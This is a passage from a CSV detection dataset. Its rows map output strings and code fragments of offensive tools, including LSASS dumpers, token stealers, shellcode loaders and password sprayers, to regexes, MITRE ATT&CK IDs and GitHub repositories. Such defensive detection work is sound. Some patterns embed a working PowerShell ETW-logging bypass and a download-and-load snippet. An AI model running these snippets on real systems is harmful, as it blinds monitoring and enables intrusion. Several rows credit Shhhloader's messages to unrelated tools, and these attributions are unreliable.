Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using Obfuscator-LLVM to compile stub*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using username enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\susername\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using WMI to set WMI SD*",".{0,1000}\[\+\]\sUsing\sWMI\sto\sset\sWMI\sSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*[+] v1.0 @decoder_it 2023*",".{0,1000}\[\+\]\sv1\.0\s\@decoder_it\s2023.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*[+] Valid login* user must enroll in MFA.*",".{0,1000}\[\+\]\sValid\slogin.{0,1000}\suser\smust\senroll\sin\sMFA\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*[+] Valid shellcode execution methods are: PoolPartyModuleStomping*",".{0,1000}\[\+\]\sValid\sshellcode\sexecution\smethods\sare\:\sPoolPartyModuleStomping.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Victim * have office365 Licence!*",".{0,1000}\[\+\]\sVictim\s.{0,1000}\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[+] WmiExec *",".{0,1000}\[\+\]\sWmiExec\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*[+] You spin my gato round right round ?*",".{0,1000}\[\+\]\sYou\sspin\smy\sgato\sround\sright\sround\s\?.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*[+] Your payload must be executed now !*",".{0,1000}\[\+\]\sYour\spayload\smust\sbe\sexecuted\snow\s!.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[+]ImpersonateLoggedOnUser() succeed!*",".{0,1000}\[\+\]ImpersonateLoggedOnUser\(\)\ssucceed!.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*[=] Dumping LSASS memory*",".{0,1000}\[\=\]\sDumping\sLSASS\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[->] sending payload..as chuncks*",".{0,1000}\[\-\>\]\ssending\spayload\.\.as\schuncks.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*[bruteforce_mode]*",".{0,1000}\[bruteforce_mode\].{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*[CamHacker]*",".{0,1000}\[CamHacker\].{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*[D3m0niz3d]~#*",".{0,1000}\[D3m0niz3d\]\~\#.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*[i] [HELL HALL] Press To Run ... *",".{0,1000}\[i\]\s\[HELL\sHALL\]\sPress\s\\sTo\sRun\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*[i] AAD Join:*enumerate*",".{0,1000}\[i\]\sAAD\sJoin\:.{0,1000}enumerate.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Argument Spoofed.*",".{0,1000}\[i\]\sArgument\sSpoofed\..{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*[i] Checking for insecure trustee/resource delegations*",".{0,1000}\[i\]\sChecking\sfor\sinsecure\strustee\/resource\sdelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[i] Credman:*Credential Blob Decrypted*",".{0,1000}\[i\]\sCredman\:.{0,1000}Credential\sBlob\sDecrypted.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Dumping LSASS Using comsvcs.dll*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\scomsvcs\.dll.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[i] Dumping LSASS Using ProcDump*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\sProcDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[i] Hooked Ntdll Base Address : *",".{0,1000}\[i\]\sHooked\sNtdll\sBase\sAddress\s\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[i] Running ADeleg and creating *",".{0,1000}\[i\]\sRunning\sADeleg\sand\screating\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[i] Sending Encrypted SAM Save*",".{0,1000}\[i\]\sSending\sEncrypted\sSAM\sSave.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[i] Unhooked Ntdll Base Address: *",".{0,1000}\[i\]\sUnhooked\sNtdll\sBase\sAddress\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[LOLSpoof] > *",".{0,1000}\[LOLSpoof\]\s\>\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*[PEzor] cleanup complete*",".{0,1000}\[PEzor\]\scleanup\scomplete.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*[PEzor] payload freed*",".{0,1000}\[PEzor\]\spayload\sfreed.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*[PEzor] starting BOF*",".{0,1000}\[PEzor\]\sstarting\sBOF.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*[Reflection.Assembly]::Load(*[Char](*)+[Char](*)+*+[Char](*)*",".{0,1000}\[Reflection\.Assembly\]\:\:Load\(.{0,1000}\[Char\]\(.{0,1000}\)\+\[Char\]\(.{0,1000}\)\+.{0,1000}\+\[Char\]\(.{0,1000}\).{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","powershell scriptblock","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*",".{0,1000}\[Reflection\.Assembly\]\:\:LoadWithPartialName\(\'System\.Core\'\)\.GetType\(\'System\.Diagnostics\.Eventing\.EventProvider\'\)\.GetField\(\'m_enabled\'.{0,1000}\'NonPublic.{0,1000}Instance\'\)\.SetValue\(\[Ref\]\.Assembly\.GetType\(\'System\.Management\.Automation\.Tracing\.PSEtwLogProvider\'\)\.GetField\(\'etwProvider\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.GetValue\(\$null\).{0,1000}0\).{0,1000}","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*['spawnto']*",".{0,1000}\[\'spawnto\'\].{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*[START]: Password spraying attack!*",".{0,1000}\[START\]\:\sPassword\sspraying\sattack!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*[string]$Class = ""PMEClass""*",".{0,1000}\[string\]\$Class\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*[System.Reflection.Assembly]::Load((Invoke-WebRequest *.exe*while ($true){Start-Sleep -s 1000}*",".{0,1000}\[System\.Reflection\.Assembly\]\:\:Load\(\(Invoke\-WebRequest\s.{0,1000}\.exe.{0,1000}while\s\(\$true\)\{Start\-Sleep\s\-s\s1000\}.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*[warn] You either fat fingered this or something else. Either way*",".{0,1000}\[warn\]\sYou\seither\sfat\sfingered\sthis\sor\ssomething\selse\.\sEither\sway.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*[x] Cannot load NTDLL.DLL*",".{0,1000}\[x\]\sCannot\sload\sNTDLL\.DLL.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[x] Failed to locate the ngentask.exe binary in the WinSxS directory*",".{0,1000}\[x\]\sFailed\sto\slocate\sthe\sngentask\.exe\sbinary\sin\sthe\sWinSxS\sdirectory.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*[X] Your harvest exploded:*",".{0,1000}\[X\]\sYour\sharvest\sexploded\:.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\ rev_shell.py*",".{0,1000}\\\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\""-SecureString\"" OR \""-AsPlainText\"" OR \""Net.NetworkCredential\""*",".{0,1000}\\\""\-SecureString\\\""\sOR\s\\\""\-AsPlainText\\\""\sOR\s\\\""Net\.NetworkCredential\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A 